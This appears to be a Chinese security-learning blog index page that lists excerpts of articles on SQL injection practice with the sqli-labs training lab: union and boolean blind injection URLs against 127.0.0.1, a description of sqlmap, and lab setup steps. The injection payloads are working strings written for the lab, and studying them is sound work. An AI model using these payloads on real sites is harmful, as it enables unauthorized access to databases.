Sqli注入
文章平均质量分 78
LztCode
学习一开始就是模仿的过程。
网络空间安全学习者
展开
-
sql注入--sqli-labs-less1~9
常规注入127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入127.原创 2020-10-23 22:38:36 · 99 阅读 · 0 评论 -
sqlmap的基本使用办法
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持13种数据库。sqlmap工作流程http://127.0.0.1/index.php?a=1&b=2&c=3当给sqNmap这么一个url的时候,它会:1.检测网站是否能够访问2.检测是否有waf3.判断可注入的参数sqlmap目录介绍doc目录,包含sqlmap的简要说明,具体使用说明、作者信息等。extra目录,包含了sqlmap的额外功能,例如发出声响、运行c原创 2020-10-20 12:02:48 · 452 阅读 · 0 评论 -
sqli-labs 盲注命令
sql盲注sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码查版本。?id=1’and left(version(),1)=5–+查库名。?id=1’and ascii(substr(database(),1,1))=115–+查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+查表长。?id=1’and length(subst原创 2020-10-16 12:13:08 · 278 阅读 · 0 评论 -
Sqli_Edited_Version安装,完美解决php7.0+版本问题
新手上路,sqli安装Github链接https://github.com/Rinkish/Sqli_Edited_Version解压Sqli_Edited_Version先解压到phpstudy的www目录下,phpstudy教程很多,这里不介绍了。修改Sqli配置文件,路径在 WWW\sqlilabs\sql-connections\db-creds.inc,将配置文件用记事本或者Sublime打开db-creds.inc修改你的用户名和密码。然后浏览器访问sqli,选择第二项rese原创 2020-09-27 12:34:06 · 427 阅读 · 0 评论